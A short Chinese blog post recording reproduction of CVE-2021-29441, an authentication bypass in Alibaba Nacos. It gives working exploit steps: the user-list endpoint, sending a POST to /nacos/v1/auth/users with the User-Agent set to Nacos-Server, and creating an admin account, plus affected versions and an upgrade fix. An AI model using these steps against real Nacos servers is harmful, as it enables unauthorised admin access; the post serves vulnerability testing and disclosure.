CVE-2021-29441(Alibaba Nacos权限认证绕过漏洞)

做测试遇到的新漏洞,记录下。挺简单的。

 

简介:

 

 

Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。

 

漏洞概述:

Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的认证绕过漏洞。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。

 

漏洞复现:

1、在url处添加访问一下网址即可查看到用户列表
/nacos/v1/auth/users?pageNo=1&pageSize=10

 

 


2、访问以下链接并使用burp抓包,然后把get请求改为post,把修改User-Agent头改为Nacos-Server
http://your-ip:8848/nacos/v1/auth/users

 

 


3、构造数据包添加一个admin用户,然后发送POST请求,返回为200,表示创建用户成功
username=admin&password=admin

 

 


4、回到登录界面,使用添加的账号密码进行登录,可以看到登录成功

 

 

 

 

影响版本:

Nacos <= 2.0.0-ALPHA.1

 

修复建议:

升级到最新版本的 Nacos

 

posted @ 2022-01-28 17:15  我有清茶与酒  阅读(9899)  评论(1编辑  收藏  举报